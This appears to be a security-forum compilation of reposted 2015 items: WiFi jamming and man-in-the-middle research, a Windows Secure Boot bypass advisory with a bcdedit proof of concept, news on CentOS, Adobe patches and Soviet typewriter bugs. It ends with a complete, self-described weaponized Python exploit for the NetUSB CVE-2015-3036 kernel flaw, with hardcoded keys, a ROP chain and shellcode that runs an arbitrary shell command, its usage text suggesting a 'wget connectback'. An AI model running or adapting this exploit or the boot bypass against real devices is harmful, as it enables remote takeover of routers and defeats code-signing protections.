Nytro

Advanced WiFi Attacks Using Commodity Hardware The WiFi protocol assumes all clients behaves fairly. This means a station will give others a chance to transmit packets, before it starts transmitting itself. It's known that with a software defined radio such as a USRP, a user can implement the WiFi protocol themselves and not follow these rules. A desktop computer, antenna, two USRPs on top of each other, and a signal analyzer. An attacker can also use this equipment to create a constant jammer, which continuously transmits noise, and makes the channel completely unusable. In principle an attacker could also turn on a badly shielded microwave to jam the channel However, that doesn't give the attacker control over which frequency is jammed, bandwidth of the emitted noise, nor the emitted noise pattern. It's even possible to implement a more sophisticated selective jammer. Such a jammer is capable of only jamming specific packets (e.g. only packets sent by a certain device). While it's already known this is possible using expensive hardware such as USRPs, we found that even cheap WiFi dongles can be used to implement all these attacks. It's especially surprising that a selective jammer can be implemented on a cheap WiFi dongle, since it must be fast enough to detect and subsequently jam a packet. Our attacks were first published at ACSAC 2014 and subsequently demonstrated at BruCON 2015. Additionally our code is available on github! You can also online.Selfish Behavior When a station wants to transmit a packet, but the channel is already in use by another device, it first waits until this transmission is done. Then it waits a random period (called the backoff period), and if no one else starts transmitting during this period, the station may send the packet. We found that it's easy to disable the random backoff period on commodity devices, meaning it will instantly transmit packets. More interestingly, we found that even the original driver and firmware for our device incorrectly calculated the backoff period, giving itself an unfair advantage over other stations! It turns out that many devices do this to gain an unfair advantage: Over six Wi-Fi cards, neither one performs as expected. In some cases, implementation issues seem to affect the proper card operation. In other cases, manufacturers rely on backoff parameters different from the standard specification, this perhaps being done on purpose to provide an unfair advantage. [Minimized conclusion from this paper] This raises the question what would happen if there are two stations that both behave selfishly by disabling the backoff period. In other words, what happens if two selfish stations instantly transmit all packets they have queued? You may think that the packets of both selfish stations will collide, and as a result both are lost in the collision. It turns out this is not the case! Due to the capture effect, the packet having the highest signal quality and lowest bitrate will get decoded properly. You can compare this to receiving two radio stations on the same frequency, where generally one station will "win the collision" ( ). This means selfish stations will abuse the capture effect, and reduce their bitrate, in order to win the collision (and have their packet decoded correctly by the receiver). Surprisingly, we now get that selfish clients wanting to maximize their throughput, will reduce their bitrate! One of our WiFi dongles attached to a Raspberry Pi There is a research prototype called DOMINO which can detect and punish this type of selfish behavior. Unfortunately we discovered a critical flaw in this system. The problem is that this system bases some of its decisions on unauthenticated packets. As an attacker we can abuse this by forging packets which appear to be sent by a different station. Hence we can make DOMINO believe this client is acting selfishly, meaning it will be punished and thrown off the network. Moral of the story: only base your decisions on authenticated or hard-to-forge data. Constant Jammer Our WiFi dongles can also be used to implement a constant jammer. The idea is straightforward: make the radio instantly transmit packets (even if someone else is transmitting), and then send an infinite amount of packets without interruption. The second part is tedious, since we can't queue many packets due to the limited amount of memory available in the WiFi dongle. However, we can simulate an infinite amount of packets. The packets queued for transmission are stored in a linked list. By turning this queue into a circular list we can simulate an infinite amount of packets. What's interesting here is that in principle the jammer is constantly transmitting valid WiFi packets. However, because they are sent so fast after one another, other WiFi devices are unable to detect these packets. In other words, other WiFi devices operating in monitor mode only see noise, and will not detect/show and show any WiFi traffic. Selective Jammer Arguably the most impressive result is that our cheap dongle can be used to implement a selective (also called reactive) jammer. Such a jammer decodes the header of a packet still in the air, and based on information in the header, decides whether to jam the remaining content or not. This is not an easy feat to accomplish. The selective jammer must be fast enough to decode the header, make the decision to jam the packet, put the antenna in transmit mode, and finally jam the packet. All this needs to be done in just a few microseconds (an average WiFi packet takes ~200 microseconds to transmit)! Jamming the end of the packet is easy, simply inject a packet like we did for the continuous jammer. But there is no support or API to be notified when a packet is in the progress of being received. How do we get around this? The important realization is that there are two chips inside our WiFi device. The first one is the radio which processes the incoming physical signal, and uses Direct Memory Access (DMA) to write the packet to memory. The second chip is the main CPU which is responsible for communicating with the host over USB and controlling the radio chip. Hence we can use the main CPU to constantly monitor the memory where the packet will be saved. Once we detect that the radio chip is writing bytes to this memory location, we know a frame is being received: When the memory is modified, we know a frame is being received. With this clever trick we can detect when a frame is being received. Our jammer then reads the MAC address(es) in the header, and compares it to the MAC address of the station we are targeting. If they match, the remaining content of the packet is jammed. This will cause the CRC (called the ICV in WiFi) of the packet to be wrong, meaning the packet will be dropped by the receiver. The code of the reactive jammer is public, feel free to play around with it (against a test network). Channel-Based Man-in-the-Middle Attack As an example, we show how these low-layer attacks can be used to reliably manipulate encrypted traffic. Note that our goal is not to decrypt traffic. Instead, we want to be able to reliably drop, modify, and inject packets. This ability is typically required in order to launch actual (cryptographic) attacks against an higher-layer protocol. Previously when targeting wireless traffic, it was not clear how to do this: there were no known methods to obtain a (reliable) man-in-the-middle position between a client and access point if encryption is used. In order to intercept (not decrypt) all traffic of an encrypted wireless network, we cannot simply create a rogue Access Point (AP) with a different MAC address. When a client connects to the access point, not only are the credentials verified (e.g. shared password), but also the MAC addresses of the client and access point. Hence the client and AP will detect that an attacker was forwarding packets under different MAC addresses. Setting up a rouge AP with the same mac address as the real AP is futile: the client will simply directly communicate with the real AP (unless they are out of range of each other). Our solution is to clone the access point on a different channel, but with the same MAC address as the real access point. We forward all frames to the real AP. In other words, we forward packets between both channels. Using the constant jammer we force clients to switch to the channel where our rogue AP is located. Since we did not modify the MAC address of the AP, and also didn't modify the MAC address of the client, the client will successfully connect to the (rogue) AP. We now have a (channel-based) man-in-the-middle position, allowing reliable manipulation of encrypted traffic. Demonstration of the Channel-Based MiTM attack against WPA-TKIP The channel-based man-in-the-middle attack can be used to break WPA-TKIP (people commonly, but incorrectly, refer to TKIP as WPA, and EAS-CCMP as WPA2). The TKIP protocol was supposed to be a temporarily replacement of WEP, designed to run on old hardware. Unfortunately, for backwards compatibility, many networks still support both TKIP and the newer EAS-CCMP. If both these protocols are supported, the older TKIP protocol is used to encrypt all broadcast packets. Without going into detail, the channel-based man-in-the-middle allows us to apply existing TKIP attacks to broadcast packets. Hence you should configure your network so only (EAS-)CCMP is enabled! Geplaatst door Mathy op 00:28 Sursa: http://www.mathyvanhoef.com/2015/10/advanced-wifi-attacks-using-commodity.html

CentOS 7 Linux OS Has Been Officially Released for the 32-Bit (i386) Architecture By Marius Nestor 15 Oct 2015, 05:35 GMT The final release of the CentOS Linux 7 32-bit distribution After being in development for quite a few months now, the port of the CentOS 7 Linux operating system to 32-bit (i686/x86) hardware architectures has been finalized earlier this week. Johnny Hughes has had the great pleasure of announcing the general availability of CentOS Linux 7 for the x86 (i386/32-bit) architectures, which is currently distributed on the official CentOS mirrors as an installable-only DVD ISO image, a Net Install ISO image, an Everything ISO image, as well as a minimal ISO image that includes a basic amount of packages. "We would like to announce the general availability of CentOS Linux 7 for the 32-bit x86 (i386) architecture," says Johnny Hughes. "This is the first major release of the 32 bit x86 by the AltArch Special Interest Group. This release is based on the Source Code from the CentOS 7 (1503) x86_64 architecture and includes all current updates from the main CentOS 7 tree." Users who want to install the CentOS 7 Linux operating system on 32-bit hardware are informed by the developers that the install process is identical with the one of the 64-bit version. Also, they should be aware of two known issues, installation on QEMU (KVM) i386 virtual machines requires the activation of the "Copy Host CPU" option, and the inability of exiting the GNOME desktop environment using the menu. Download CentOS Linux 7 for 32-bit architectures right now from Softpedia. Sursa: CentOS 7 Linux OS Has Been Officially Released for the 32-Bit (i386) Architecture - Softpedia

Vulnerability title (Microsoft): Trusted Boot Security Feature Bypass VulnerabilityCVE: CVE-2015-2552 Vendor: Microsoft Product: Windows NT series 8.0+ Affected versions: See "systems affected". Reported by: "Myria" Vulnerability Summary: ===================== An attacker with administrative access to a Windows machine with UEFI Secure Boot enabled may bypass code signing policy checks by putting intentionally- malformed configuration options in the boot configuration database (BCD). Vulnerability Details: ===================== On a Windows system with Secure Boot enabled, Windows doesn't correctly protect against attempts to enable features that are prohibited while UEFI Secure Boot is enabled, such as "test-signing" and the local kernel debugger. This allows things such as loading unsigned kernel drivers, or, in locked-down Windows installations like Windows RT, effect a "jailbreak". In Windows Vista and later, the boot configuration database ("BCD") is a registry hive used by the operating system boot loader to load and prepare the NT kernel (ntoskrnl.exe) for launch. In UEFI systems, this task is split between bootmgr.efi and winload.efi. The latter is what contains this vulnerability. One of winload.efi's responsibilities is to take the settings in BCD and translate them to a simple command line for the kernel, similarly to Linux. When an attempt to enable a prohibited feature such as "test-signing" occurs the standard way, winload.efi will block the attempt by not passing the "/TESTSIGNING" command-line option to the NT kernel. The BCD setting named "loadoptions" allows passing arbitrary kernel command line arguments to the NT kernel. An obvious attack would be to attempt to pass "/TESTSIGNING" by putting it into the "loadoptions" field. winload.efi counters this obvious attack by checking against a blacklist of strings, but fails to account for Unicode. BCD, being a registry hive, stores all strings as UTF-16. To search for the prohibited strings, winload.efi calls wcsstr(). However, ntoskrnl.exe takes its command line as ASCII bytes. To do the conversion from Unicode to ASCII, winload.efi simply truncates each UTF-16 code point to 8 bits. The bug is then simple: winload.efi is checking against pre-transformed data, while ntoskrnl.exe is checking post-transformed data. By replacing character(s) of a blacklisted string with Unicode characters that become the original character(s) when truncated to 8 bits, one can get past the wcsstr() check while still passing the desired parameter to the kernel. Proof of Concept: ================ In an Administrator-privileged instance of PowerShell, execute the following command, then reboot: bcdedit /set '{current}' loadoptions '/T_STSIGNING' replacing "_" with the Unicode character U+0145 ("Latin Capital Letter N With Cedilla"). The machine will come back up with test-signing enabled, which can be seen by the watermark in the lower-right corner of the desktop. Impact: ====== Users or programs with administrative access to a machine can escalate to kernel privilege by loading unsigned drivers, or using the kernel debugger to poke at kernel memory and gain arbitrary code execution. Users can intentionally use this on their own devices to bypass lockdowns for certain products (Windows Phone, Windows RT). Mitigating Factors: ================== - The attack requires administrative access. - A watermark appears when this is enabled, but this is bypassable. No public attack against systems for which the owner does not want the exploit is known. Systems affected: ================ UEFI systems with Secure Boot enabled running the following: Windows 8 Windows 8.1 Windows Server 2012 Windows Server 2012 R2 Windows 10 Windows Server 2016 Technical Preview Windows RT 8.0 Windows RT 8.1 Windows Phone 8 Windows Phone 8.1 Windows Mobile 10 Preview Advisory: ======== https://technet.microsoft.com/en-us/library/security/ms15-111.aspx Solution: ======== Install KB3088195. https://support.microsoft.com/en-us/kb/3096447 (mismatched number intentional) Disclosure Timeline: =================== Discovery: Approximately summer 2013 Vendor notification: Unknown Vendor fixed vulnerability: October 13, 2015 Public advisory: October 13, 2015 Public disclosure: October 13, 2015 The author, the original discoverer, did not report it. The author believes that the disclosure happened in approximately spring 2015. Sursa: [CVE-2015-2552] Windows 8+ - Trusted Boot Bypass - Pastebin.com

"The spam emails sent included some suggesting that a package had been sent" Am primit si eu o gramada de mail-uri ca as fi primit ceva de la FedEx. Nu primisem.

This Guy Builds A Thor-Like Hammer that Only He Can Pick Up Tuesday, October 13, 2015 Swati Khandelwal If you have watched the most recent Avengers movie, then you would be aware of a scene where all the superheroes Iron Man, War Machine, Hawkeye, and Captain America take turns to lift Thor’s hammer but fail. Someone has an explanation, Why? Inspired by Thor's legendary hammer Mjolnir that is not liftable by anyone except Thor, an electrical engineer has built a real-life Mjolnir that only he can pick up. Electrical engineer Allen Pan, who also runs the Sufficiently Advanced YouTube channel, created a giant hammer that only he can lift, so long as the hammer is on a metal surface. To make his hammer immovable, Pan made use of: A capacitive touch sensor (fingerprint sensor) attached to the handle An Arduino Pro Mini and a solid state relay, which serves as a switching device. A microwave oven transformer electromagnet that uses electricity to produce a very strong magnetic field. The electromagnet creates a very strong magnetic field, strong enough that when the hammer is placed on a metal surface, it feels too heavy to lift. With only a little bit of programming, Pan made the fingerprint sensor act as a switch — so when he grabs the hammer's handle and places his thumb on the sensor, the electromagnets turns off, allowing only him to lift the hammer. When he moves his thumb over the sensor, the magnets switch OFF again, allowing nobody else to lift the hammer, except Pan. "The handle is imprinted," Pan says, suggesting that "whosoever carries Thor's fingerprints" would be able to lift it. You can also watch the YouTube video, in which Pan tricked a bunch of people into trying to lift the hammer, but the only guy who finally lifted the hammer was him. Sursa: http://thehackernews.com/2015/10/electromagnetic-thor-hammer.html

Adobe releases 69 security updates for Flash Player, Acrobat and Reader by Jason Murdock 14 Oct 2015 Adobe has released 69 security updates to address multiple vulnerabilities in Flash Player, Reader and Acrobat. Initially published on Adobe's Product Security Incident Response Team blog, two updates, APSB15-24 and APSB15-25, are needed to stay protected from security threats. Acrobat and Reader The Adobe security advisory lists 56 critical security updates covering Acrobat and Reader which could allow an attacker to take control of an infected computer. The updates are available now for Acrobat DC, XI and Reader X on Windows and Mac. Many of the flaws could lead to code execution, including memory corruption, heap buffer overflow and use-after-free vulnerabilities. Updates CVE-2015-4446, CVE-2015-5090 and CVE-2015-5106 resolve "validation bypass issues" that could give hackers increased privileges on an infected system. One notable flaw, CVE-2015-5091, resolves a validation bypass problem that could be exploited to cause a denial-of-service attack. Adobe thanked a number of security research groups for helping to uncover the flaws, including the HP Zero Day Initiative, Google Project Zero and VeriSign iDefence Labs. The company released a ‘pre-notification' on 8 October outlining the security vulnerabilities in the Adobe software. Flash Adobe released a further 13 fixes for Flash Player for Windows, Mac, Chrome OS and Linux. The CVE-2015-5569 to CVE-2015-7644 updates are all listed as critical, and most of the vulnerabilities could lead to code execution. One notable Flash flaw, CVE-2015-7628, could be exploited to "bypass the same-origin-policy and lead to information disclosure". This is the second batch of security fixes for Flash Player in the past month. Adobe revealed fixes for 23 critical vulnerabilities in the software on 21 September that could allow an attacker to take full control of an infected system. David Bisson, writing on grahamcluley.com, explained that Flash has had a "tough couple of months" after numerous flaws were found in the product that were being used by Italian security company Hacking Team. "Adobe fixed the Hacking Team bugs in a large patch last month but, as this current patching cycle illustrates, researchers continue to find vulnerabilities in Flash by the dozen. "I would therefore urge you to implement these updates ASAP before an attacker begins exploiting the vulnerabilities in the wild. It might also be worth enabling Click-to-Play for Flash, or disabling Flash altogether." Sursa: http://www.v3.co.uk/v3-uk/news/2430399/adobe-releases-69-security-updates-for-flash-player-acrobat-and-reader

How Soviets used IBM Selectric keyloggers to spy on US diplomats Highly sophisticated bugs went undetected for 8 years during the Cold War. by Dan Goodin - Oct 13, 2015 9:15pm EEST Etan J. Tal A National Security Agency memo that recently resurfaced a few years after it was first published contains a detailed analysis of what very possibly was the world's first keylogger—a 1970s bug that Soviet spies implanted in US diplomats' IBM Selectric typewriters to monitor classified letters and memos. The electromechanical implants were nothing short of an engineering marvel. The highly miniaturized series of circuits were stuffed into a metal bar that ran the length of the typewriter, making them invisible to the naked eye. The implant, which could only be seen using X-ray equipment, recorded the precise location of the little ball Selectric typewriters used to imprint a character on paper. With the exception of spaces, tabs, hyphens, and backspaces, the tiny devices had the ability to record every key press and transmit it back to Soviet spies in real time. A “lucrative source of information” The Soviet implants were discovered through the painstaking analysis of more than 10 tons' worth of equipment seized from US embassies and consulates and shipped back to the US. The implants were ultimately found inside 16 typewriters used from 1976 to 1984 at the US embassy in Moscow and the US consulate in Leningrad. The bugs went undetected for the entire eight-year span and only came to light following a tip from a US ally whose own embassy was the target of a similar eavesdropping operation. "Despite the ambiguities in knowing what characters were typed, the typewriter attack against the US was a lucrative source of information for the Soviets," an NSA document, which was declassified several years ago, concluded. "It was difficult to quantify the damage to the US from this exploitation because it went on for such a long time." The NSA document was published here in 2012. Ars is reporting the document because it doesn't appear to have been widely covered before and generated a lively conversation Monday on the blog of encryption and security expert Bruce Schneier. When the implant was first reported, one bugging expert cited in Discover magazine speculated that it worked by measuring minute differences in the time it took each character to be imprinted. That theory was based on the observation that the time the Selectric ball took to complete a rotation was different for each one. A low-tech listening device planted in the room would then transmit the sounds of a typing Selectric to a Soviet-operated computer that would reconstruct the series of key presses. In fact, the implant was far more advanced and worked by measuring the movements of the "bail," which was the term analysts gave to the mechanical arms that controlled the pitch and rotation of the ball. According to the NSA document: In reality, the movement of the bails determined which character had been typed because each character had a unique binary movement corresponding to the bails. The magnetic energy picked up by the sensors in the bar was converted into a digital electrical signal. The signals were compressed into a four-bit frequency select word. The bug was able to store up to eight four-bit characters. When the buffer was full, a transmitter in the bar sent the information out to Soviet sensors. There was some ambiguity in determining which characters had been typed. NSA analysts using the laws of probability were able to figure out how the Soviets probably recovered text. Other factors which made it difficult to recover text included the following: The implant could not detect characters that were typed without the ball moving. If the typist pressed space, tab shift, or backspace, these characters were invisible to the implant. Since the ball did not move or tilt when the typist pressed hyphen because it was located at the ball’s home position, the bug could not read this character either. The implants were also remarkable for the number of upgrades they received. Far from being a static device that was built once and then left to do its job, the bugs were constantly refined. The document says: The Soviets continually upgraded and improved their implants. There were five varieties or generations of bugs. Three types of units operated using DC power and contained either eight, nine, or ten batteries. The other two types operated from AC power and had beacons to indicate whether the typewriter was turned on or off. Some of the units also had a modified on and off switch with a transformer, while others had a special coaxial screw with a spring and lug. The modified switch sent power to the implant. Since the battery-powered machines had their own internal source of power, the modified switch was not necessary. The special coaxial screw with a spring and lug connected the implant to the typewriter linkage, and this linkage was used as an antenna to transmit the information as it was being typed. Later battery-powered implants had a test point underneath an end screw. By removing the screw and inserting a probe, an individual could easily read battery voltage to see if the batteries were still active. The ingenuity of the Soviets was remarkable because they did not merely move from batteries as a source of power to alternating current. There were early versions and later versions of bugs that used both sources of power. NSA found that the first three implants were battery powered. The first of these was shipped to Moscow in October 1976, and the other two were shipped in April of 1977. The first bug that used alternating current as its source of power was shipped to Moscow in November 1977. The remaining nine machines that were found in Moscow used alternating current as their source of power and were more advanced than the first AC-powered bug. Five of the advanced model AC bugged typewriters were delivered to Moscow in February 1982. The remainder were delivered in January of 1984. The later battery-powered bugged typewriters found in the consulate in Leningrad were shipped in April of 1977 and March of 1982. All of the implants were quite sophisticated. Each implant had a magnetometer that converted the mechanical energy of key strokes into local magnetic disturbances. The electronics package in the implant responded to these disturbances, categorized the underlying data, and transmitted the results to a nearby listening post. Data were transmitted via radio frequency. The implant was enabled by remote control. Another advantage of these bugs was easy installation. Engineers estimated that a skilled technician could install an implant in a typewriter in a half hour. The integrated circuits were very sophisticated for that time period. The circuits contained one bit core memory, an advancement that NSA engineers had never seen. Enlarge / A magnified view of the bugged Selectric power switch. NSA The devices could be turned off to avoid detection when the Soviets knew inspection teams were in close proximity. Newer devices operated by the US may have had the ability to detect the implants, but even then an element of luck would have been required, since the infected typewriter would have to be turned on, the bug would have to be turned on, and the analyzer would have to be tuned to the right frequency. To lower this risk, Soviet spies deliberately designed the devices to use the same frequency band as local television stations. The account of "Project Gunman," which was the name given to the once-covert operation to discover and respond to the implants, underscores how drastically hacking has changed in the past 40 years. "It's a lot easier now because everything is connected," Schneier, who is chief technology officer of Resilient Systems Inc., told Ars. "Everything is computerized and [that] makes it so much easier. When you just have to hack into somebody's computer, even if it's completely separate from the Internet, it's a much easier job, and that's why everybody can do it, including the criminals." Sursa: http://arstechnica.com/security/2015/10/how-soviets-used-ibm-selectric-keyloggers-to-spy-on-us-diplomats/

CVE-2015-3036 - NetUSB Remote Code Execution exploit (Linux/MIPS) #!/usr/bin/env python# # CVE-2015-3036 - NetUSB Remote Code Execution exploit (Linux/MIPS) # =========================================================================== # This is a weaponized exploit for the NetUSB kernel vulnerability # discovered by SEC Consult Vulnerability Lab. [1] # # I don't like lazy vendors, I've seen some DoS PoC's floating around # for this bug.. and it's been almost five(!) months. So lets kick it up # a notch with an actual proof of concept that yields code exec. # # So anyway.. a remotely exploitable kernel vulnerability, exciting eh. ;-) # # Smash stack, ROP, decode, stage, spawn userland process. woo! # # Currently this is weaponized for one target device (the one I own, I was # planning on porting OpenWRT but got sidetracked by the NetUSB stuff in # the default firmware image, oooops. ;-D). # # This python script is horrible, but its not about the glue, its about # the tech contained therein. Some things *may* be (intentionally?) botched.. # lets see if "the community" cares enough to develop this any further, # I need to move on with life. ;-D # # Shoutouts to all my boys & girls around the world, you know who you are! # # Peace, # -- blasty <peter@haxx.in> // 20151013 # # References: # [1] : https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt # /20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt # import os, sys, struct, socket, time from Crypto.Cipher import AES def u32(v): return struct.pack("<L", v) def banner(): print "" print "## NetUSB (CVE-2015-3036) remote code execution exploit" print "## by blasty <peter@haxx.in>" print "" def usage(prog): print "usage : %s <host> <port> <cmd>" % (prog) print "example : %s 127.0.0.1 20005 'wget connectback..." % (prog) print "" banner() if len(sys.argv) != 4: usage(sys.argv[0]) exit(0) cmd = sys.argv[3] # Here's one, give us more! (hint: /proc/kallsyms and objdump, bro) targets = [ { "name" : "WNDR3700v5 - Linux 2.6.36 (mips32-le)", "kernel_base" : 0x80001000, # adjust to offset used in 'load_addr_and_jump' gadget # should be some big immediate to avoid NUL bytes "load_addr_offset" : 4156, "gadgets" : { # 8c42103c lw v0,4156(v0) # 0040f809 jalr v0 # 00000000 nop 'load_addr_and_jump' : 0x1f548, # 8fa20010 lw v0,16(sp) # 8fbf001c lw ra,28(sp) # 03e00008 jr ra # 27bd0020 addiu sp,sp,32 'load_v0_and_ra' : 0x34bbc, # 27b10010 addiu s1,sp,16 # 00602021 move a0,v1 # 0040f809 jalr v0 # 02202821 move a1,s1 'move_sp_plus16_to_s1' : 0x63570, # 0220f809 jalr s1 # 00000000 nop 'jalr_s1' : 0x63570, 'a_r4k_blast_dcache' : 0x6d4678, 'kmalloc' : 0xb110c, 'ks_recv' : 0xc145e270, 'call_usermodehelper_setup' : 0x5b91c, 'call_usermodehelper_exec' : 0x5bb20 } } ] # im lazy, hardcoded to use the only avail. target for now # hey, at least I made it somewhat easy to easily add new targets target = targets[0] # hullo there. hello = "\x56\x03" # sekrit keyz that are hardcoded in netusb.ko, sorry KCodes # people, this is not how you implement auth. lol. aesk0 = "0B7928FF6A76223C21A3B794084E1CAD".decode('hex') aesk1 = "A2353556541CFE44EC468248064DE66C".decode('hex') key = aesk1 IV = "\x00"*16 mode = AES.MODE_CBC aes = AES.new(key, mode, IV=IV) aesk0_d = aes.decrypt(aesk0) aes2 = AES.new(aesk0_d, mode, IV="\x00"*16) s = socket.create_connection((sys.argv[1], int(sys.argv[2], 0))) print "[>] sending HELLO pkt" s.send(hello) time.sleep(0.2) verify_data = "\xaa"*16 print "[>] sending verify data" s.send(verify_data) time.sleep(0.2) print "[>] reading response" data = s.recv(0x200) print "[!] got %d bytes .." % len(data) print "[>] data: " + data.encode('hex') pkt = aes2.decrypt(data) print "[>] decr: " + pkt.encode("hex") if pkt[0:16] != "\xaa"*16: print "[!] error: decrypted rnd data mismatch :(" exit(-1) rnd = data[16:] aes2 = AES.new(aesk0_d, mode, IV="\x00"*16) pkt_c = aes2.encrypt(rnd) print "[>] sending back crypted random data" s.send(pkt_c) # Once upon a time.. d = "A" # hardcoded decoder_key, this one is 'safe' for the current stager decoder_key = 0x1337babf # NUL-free mips code which decodes the next stage, # flushes the d-cache, and branches there. # loosely inspired by some shit Julien Tinnes once wrote. decoder_stub = [ 0x0320e821, # move sp,t9 0x27a90168, # addiu t1,sp,360 0x2529fef0, # addiu t1,t1,-272 0x240afffb, # li t2,-5 0x01405027, # nor t2,t2,zero 0x214bfffc, # addi t3,t2,-4 0x240cff87, # li t4,-121 0x01806027, # nor t4,t4,zero 0x3c0d0000, # [8] lui t5, xorkey@hi 0x35ad0000, # [9] ori t5,t5, xorkey@lo 0x8d28fffc, # lw t0,-4(t1) 0x010d7026, # xor t6,t0,t5 0xad2efffc, # sw t6,-4(t1) 0x258cfffc, # addiu t4,t4,-4 0x140cfffb, # bne zero,t4,0x28 0x012a4820, # add t1,t1,t2 0x3c190000, # [16] lui t9, (a_r4k_blast_dcache-0x110)@hi 0x37390000, # [17] ori t9,t9,(a_r4k_blast_dcache-0x110)@lo 0x8f390110, # lw t9,272(t9) 0x0320f809, # jalr t9 0x3c181234, # lui t8,0x1234 ] # patch xorkey into decoder stub decoder_stub[8] = decoder_stub[8] | (decoder_key >> 16) decoder_stub[9] = decoder_stub[9] | (decoder_key & 0xffff) r4k_blast_dcache = target['kernel_base'] r4k_blast_dcache = r4k_blast_dcache + target['gadgets']['a_r4k_blast_dcache'] # patch the r4k_blast_dcache address in decoder stub decoder_stub[16] = decoder_stub[16] | (r4k_blast_dcache >> 16) decoder_stub[17] = decoder_stub[17] | (r4k_blast_dcache & 0xffff) # pad it out d += "A"*(233-len(d)) # kernel payload stager kernel_stager = [ 0x27bdffe0, # addiu sp,sp,-32 0x24041000, # li a0,4096 0x24050000, # li a1,0 0x3c190000, # [3] lui t9,kmalloc@hi 0x37390000, # [4] ori t9,t9,kmalloc@lo 0x0320f809, # jalr t9 0x00000000, # nop 0x0040b821, # move s7,v0 0x02602021, # move a0,s3 0x02e02821, # move a1,s7 0x24061000, # li a2,4096 0x00003821, # move a3,zero 0x3c190000, # [12] lui t9,ks_recv@hi 0x37390000, # [13] ori t9,t9,ks_recv@lo 0x0320f809, # jalr t9 0x00000000, # nop 0x3c190000, # [16] lui t9,a_r4k_blast_dcache@hi 0x37390000, # [17] ori t9,t9,a_r4k_blast_dcache@lo 0x8f390000, # lw t9,0(t9) 0x0320f809, # jalr t9 0x00000000, # nop 0x02e0f809, # jalr s7 0x00000000 # nop ] kmalloc = target['kernel_base'] + target['gadgets']['kmalloc'] ks_recv = target['gadgets']['ks_recv'] # patch kernel stager kernel_stager[3] = kernel_stager[3] | (kmalloc >> 16) kernel_stager[4] = kernel_stager[4] | (kmalloc & 0xffff) kernel_stager[12] = kernel_stager[12] | (ks_recv >> 16) kernel_stager[13] = kernel_stager[13] | (ks_recv & 0xffff) kernel_stager[16] = kernel_stager[16] | (r4k_blast_dcache >> 16) kernel_stager[17] = kernel_stager[17] | (r4k_blast_dcache & 0xffff) # a ROP chain for MIPS, always ew. rop = [ # this gadget will # v0 = *(sp+16) # ra = *(sp+28) # sp += 32 target['kernel_base'] + target['gadgets']['load_v0_and_ra'], # stack for the g_load_v0_and_ra gadget 0xaaaaaaa1, # sp+0 0xaaaaaaa2, # sp+4 0xaaaaaaa3, # sp+8 0xaaaaaaa4, # sp+12 r4k_blast_dcache - target['load_addr_offset'], # sp+16 / v0 0xaaaaaaa6, # sp+20 0xaaaaaaa7, # sp+24 # this gadget will # v0 = *(v0 + 4156) # v0(); # ra = *(sp + 20) # sp += 24 # ra(); target['kernel_base'] + target['gadgets']['load_addr_and_jump'], # sp+28 0xbbbbbbb2, 0xccccccc3, 0xddddddd4, 0xeeeeeee5, 0xeeeeeee6, # this is the RA fetched by g_load_addr_and_jump target['kernel_base'] + target['gadgets']['load_v0_and_ra'], # stack for the g_load_v0_and_ra gadget 0xaaaaaaa1, # sp+0 0xaaaaaaa2, # sp+4 0xaaaaaaa3, # sp+8 0xaaaaaaa4, # sp+12 target['kernel_base'] + target['gadgets']['jalr_s1'], # sp+16 / v0 0xaaaaaaa6, # sp+20 0xaaaaaaa7, # sp+24 target['kernel_base'] + target['gadgets']['move_sp_plus16_to_s1'], # ra # second piece of native code getting executed, pivot back in the stack 0x27b9febc, # t9 = sp - offset 0x0320f809, # jalr t9 0x3c181234, # nop 0x3c181234, # nop # first native code getting executed, branch back to previous 4 opcodes 0x03a0c821, # move t9, sp 0x0320f809, # jalr t9 0x3c181234, ] # append rop chain to buffer for w in rop: d += u32(w) # append decoder_stub to buffer for w in decoder_stub: d += u32(w) # encode stager and append to buffer for w in kernel_stager: d += u32(w ^ decoder_key) print "[>] sending computername_length.." time.sleep(0.1) s.send(struct.pack("<L", len(d))) print "[>] sending payload.." time.sleep(0.1) s.send(d) time.sleep(0.1) print "[>] sending stage2.." # a useful thing to do when you bust straight into the kernel # is to go back to userland, huhuhu. # thanks to jix for the usermodehelper suggestion! kernel_shellcode = [ 0x3c16dead, # lui s6,0xdead 0x3c19dead, # lui t9,0xdead 0x3739c0de, # ori t9,t9,0xc0de 0x2404007c, # li a0, argv 0x00972021, # addu a0,a0,s7 0x2405008c, # li a1, argv0 0x00b72821, # addu a1,a1,s7 0xac850000, # sw a1,0(a0) 0x24050094, # li a1, argv1 0x00b72821, # addu a1,a1,s7 0xac850004, # sw a1,4(a0) 0x24060097, # li a2, argv2 0x00d73021, # addu a2,a2,s7 0xac860008, # sw a2,8(a0) 0x00802821, # move a1,a0 0x2404008c, # li a0, argv0 0x00972021, # addu a0,a0,s7 0x24060078, # li a2, envp 0x00d73021, # addu a2,a2,s7 0x24070020, # li a3,32 0x3c190000, # [20] lui t9,call_usermodehelper_setup@hi 0x37390000, # [21] ori t9,t9,call_usermodehelper_setup@lo # call_usermodehelper_setup(argv[0], argv, envp, GPF_ATOMIC) 0x0320f809, # jalr t9 0x00000000, # nop 0x00402021, # move a0,v0 0x24050002, # li a1,2 0x3c190000, # [26] lui t9,call_usermodehelper_exec@hi 0x37390000, # [27] ori t9,t9,call_usermodehelper_exec@lo # call_usermodehelper_exec(retval, UHM_WAIT_PROC) 0x0320f809, # jalr t9 0x00000000, # nop # envp ptr 0x00000000, # argv ptrs 0x00000000, 0x00000000, 0x00000000, 0x00000000 ] usermodehelper_setup = target['gadgets']['call_usermodehelper_setup'] usermodehelper_exec = target['gadgets']['call_usermodehelper_exec'] # patch call_usermodehelper_setup into kernel shellcode kernel_shellcode[20] = kernel_shellcode[20] | (usermodehelper_setup>>16) kernel_shellcode[21] = kernel_shellcode[21] | (usermodehelper_setup&0xffff) # patch call_usermodehelper_setup into kernel shellcode kernel_shellcode[26] = kernel_shellcode[26] | (usermodehelper_exec>>16) kernel_shellcode[27] = kernel_shellcode[27] | (usermodehelper_exec&0xffff) payload = "" for w in kernel_shellcode: payload += u32(w) payload += "/bin/sh\x00" payload += "-c\x00" payload += cmd # and now for the moneyshot s.send(payload) print "[~] KABOOM! Have a nice day." Sursa: http://haxx.in/blasty-vs-netusb.py

